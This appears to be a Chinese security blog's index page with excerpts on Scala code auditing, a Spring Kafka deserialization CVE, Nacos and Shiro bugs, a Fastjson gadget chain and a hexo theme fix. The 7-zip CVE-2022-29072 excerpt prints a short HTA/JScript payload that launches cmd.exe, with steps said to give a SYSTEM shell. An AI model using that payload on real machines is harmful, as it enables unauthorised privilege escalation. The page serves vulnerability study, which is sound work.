Scala代码审计从入门到入坟

置顶 | 发表于 2025-04-11 更新于 2025-07-29 分类于漏洞原理，代码审计
本文字数： 8.9k 阅读时长 ≈ 32 分钟

Scala代码审计从入门到入坟

引言

Scala 是一门多范式的编程语言，集成了面向对象编程和函数式编程的多种特性。函数式编程抽象的理论基础也让这门语言变得抽象起来，初学者需要花更多的时间去理解其特有概念以及众多的语法糖。Scala是一门运行在JVM平台上的语言，其源码编译结果符合Java字节码规范，所以可以被反编译为Java代码。在进行Scala代码审计的过程中，审计者很少有机会直面其源码，大多数时候都是被反编译为Java的代码所支配。Scala与Java毕竟是两门语言，反编译成Java代码的后果便是丧失了动态调试的能力（这为审计者带来了不小的麻烦），反编译后产生的中间代码、临时变量等辅助结构更是极大得降低了代码的可读性。本文将带领诸位抽丝剥茧逐步梳理出Scala各语法结构与Java语法结构对应关系，然后以两个漏洞的分析结尾。

阅读全文 »

Spring Kafka 消息头反序列化漏洞（CVE-2023-34040）

置顶 | 发表于 2025-04-10 更新于 2025-07-29 分类于漏洞分析，安全技术
本文字数： 2.2k 阅读时长 ≈ 8 分钟

Spring Kafka消息头反序列化漏洞（CVE-2023-34040）

产品介绍

Spring for Apache Kafka (Spring - Kafka)项目将Spring的核心概念应用于基于Kafka的消息传递解决方案的开发。它提供了一个“template”作为发送消息的高级抽象。它还支持带有@KafkaListener注解和“listener container”的消息驱动POJOs 。这些库提倡使用依赖注入和声明式的使用方式。所有这些例子都与Spring框架的JMS支持和Spring AMQP对RabbitMQ的支持有相似之处。

漏洞概述

当Kafka应用服务器允许一个不受信任的源的生产消息的时候，若其能够控制消息的headers，则可能导致一个反序列化漏洞的发生。

阅读全文 »

Nacos 文件上传功能条件竞争RCE

发表于 2025-05-15 更新于 2025-07-29
本文字数： 9 阅读时长 ≈ 1 分钟

https://uzzju.com/post/87.java
https://rivers.chaitin.cn/blog/cqcu0eh0lnee0vjd59i0

Java线程复用导致的认证绕过

发表于 2025-04-30 更新于 2025-07-29
本文字数： 31 阅读时长 ≈ 1 分钟

线程池复用TreadLocal

静态变量未同步

缓存处理不当

tomcat rce

异步操作处理不当

nacos rce

解决hexo-next主题上游仓库改变告警

发表于 2025-04-14 更新于 2025-07-29 分类于 bug修复， tips
本文字数： 167 阅读时长 ≈ 1 分钟

找到安装的hexo-next-title hexo-next-share hexo-next-exif hexo-next-utteranc等插件的安装目录在其目录下找到node_modules目录
观察是否存在 next-util 目录，若存在打开该目录中的index.js进行修改
注释调添加的before_generate过滤器

'use strict';

const yaml = require('js-yaml');
const fs = require('fs');
const path = require('path');
const { merge } = require('lodash');

module.exports = function(hexo, pluginDir) {
  hexo.extend.filter.register('before_generate', function err() {
    //hexo.log.warn(`The upstream repository of theme NexT has been changed.`);
    //hexo.log.warn(`For more information: https://github.com/next-theme/hexo-theme-next`);
    //hexo.log.warn(`Documentation: https://theme-next.js.org`);
  });
  this.hexo = hexo;
  this.pluginDir = pluginDir;
  this.getFilePath = function(file) {
    return this.pluginDir ? path.resolve(this.pluginDir, file) : file;
  };
  this.getFileContent = function(file) {
    return fs.readFileSync(this.getFilePath(file), 'utf8');
  };
  this.defaultConfigFile = function(key, file) {
    const defaultConfig = file ? yaml.safeLoad(this.getFileContent(file)) : {};
    this.hexo.config[key] = merge(defaultConfig[key], this.hexo.theme.config[key], this.hexo.config[key]);
    return this.hexo.config[key];
  };
};

7-zip权限提升漏洞【CVE-2022-29072】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 126 阅读时长 ≈ 1 分钟

这玩意儿很简单，原理不清楚，不过7-zip官方并不承认这个漏洞，他们说这个洞是微软的锅，不过我看也确实是。

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

找个文本文件把上面的内容写进去，然后讲后缀名改为7z。然后讲这个文件拖动到7zip的helper窗口中就会弹出DOS窗口，查看当前权限可以看到为system权限

Apache Shiro RegExPatternMatcher 认证绕过【CVE-2022-32532】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 172 阅读时长 ≈ 1 分钟

本文简要介绍了 CVE-2022-32532 的漏洞成因

阅读全文 »

Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 3.7k 阅读时长 ≈ 13 分钟

@TOC

我们知道Fastjson在进行序列化的时候会调用当前类的所有getter方法去获取所有public成员变量的值，像这样：

package com.armandhe.javabase;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class FastjsonTest {
    public static void main(String[] args) {
        FastjsonUnserilizeTest fastjsonUnserilizeTest = new FastjsonUnserilizeTest();
//        fastjsonUnserilizeTest.setAge(20);
//        fastjsonUnserilizeTest.setName("armandhenewpy");
        String s = JSON.toJSONString(fastjsonUnserilizeTest, SerializerFeature.WriteClassName);
        System.out.println(s);
//        String s1 = "{\"@type\":\"com.armandhe.javabase.FastjsonUnserilizeTest\",\"age\":20,\"name\":\"armandhenewpy\"}";
//        JSONObject jsonObject = JSON.parseObject(s1);
//        System.out.println(jsonObject);
    }
}